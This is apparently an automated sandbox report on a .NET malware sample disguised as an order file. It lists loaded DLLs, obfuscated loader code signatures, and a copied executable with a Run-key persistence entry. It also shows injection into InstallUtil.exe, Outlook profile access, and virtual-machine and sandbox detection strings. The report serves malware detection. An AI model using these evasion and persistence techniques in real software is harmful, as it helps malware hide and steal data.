                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: GEFA-Order 232343-68983689.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: GEFA-Order 232343-68983689.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1736166624.0000000006F60000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.000000000440A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000281A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.000000000314C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1736166624.0000000006F60000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.000000000440A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000281A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.000000000314C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, zD4eAqejnbD8YI9R4OZ.cs .Net Code: Type.GetTypeFromHandle(Sx15xO0TOnhA2u0ZdoK.JAfPsLRys8(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Sx15xO0TOnhA2u0ZdoK.JAfPsLRys8(16777259)),Type.GetTypeFromHandle(Sx15xO0TOnhA2u0ZdoK.JAfPsLRys8(16777263))})
                    Source: GEFA-Order 232343-68983689.exe, Zobwfhfng.cs .Net Code: Octjwv System.AppDomain.Load(byte[])
                    Source: Cbgoomiexw.exe.0.dr, Zobwfhfng.cs .Net Code: Octjwv System.AppDomain.Load(byte[])
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                    Source: 0.2.GEFA-Order 232343-68983689.exe.3475368.1.raw.unpack, Zobwfhfng.cs .Net Code: Octjwv System.AppDomain.Load(byte[])
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, ReflectionHelper.cs .Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, XmlSerializationHelper.cs .Net Code: ReadObjectProperties
                    Source: Yara match File source: 0.2.GEFA-Order 232343-68983689.exe.6e10000.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000007.00000002.1965310119.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1735614547.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.1881514343.000000000269A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7444, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Cbgoomiexw.exe PID: 7744, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: Cbgoomiexw.exe PID: 8052, type: MEMORYSTR
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, AssemblyLoader.cs High entropy of concatenated method names: 'CultureToString', 'ReadExistingAssembly', 'CopyTo', 'LoadStream', 'LoadStream', 'ReadStream', 'ReadFromEmbeddedResources', 'ResolveAssembly', 'Attach', 'xAeipOJKHKFbfhP6Vuq'
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, uIiY3gi8rETsT9Cm4WP.cs High entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'JarigQqLwn', 'NtProtectVirtualMemory', 'cDWcjs7tIE1NJX8AE4q', 'ARbs8N7KUR7GPNqU7hN', 'wtOeZk7sy4jC09TuyRP', 'gZl5Ay73iFAyZHMUPKT'
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe File created: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Cbgoomiexw
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match, File source: Process Memory Space: GEFA-Order 232343-68983689.exe PID: 7444, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: Cbgoomiexw.exe PID: 7744, type: MEMORYSTR
                    Source: Yara match, File source: Process Memory Space: Cbgoomiexw.exe PID: 8052, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000269A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000030A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Memory allocated: 18E0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Memory allocated: 3260000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Memory allocated: 5260000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1380000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2F00000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1410000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe Memory allocated: 25C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe Memory allocated: 2650000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe Memory allocated: 4650000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: DD0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2880000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 4880000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe Memory allocated: 1520000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe Memory allocated: 2FF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exe Memory allocated: 4FF0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 30B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 32C0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: InstallUtil.exe, 00000001.00000002.1879587990.0000000001286000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq>
                    Source: Cbgoomiexw.exe, 00000007.00000002.1961076055.00000000012E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                    Source: Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000030A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: Cbgoomiexw.exe, 00000007.00000002.1965310119.00000000030A1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                    Source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1714806608.0000000001687000.00000004.00000020.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1878408831.000000000095B000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.1986513923.0000000005DD0000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2941663496.0000000006600000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exe Process information queried: ProcessInformation
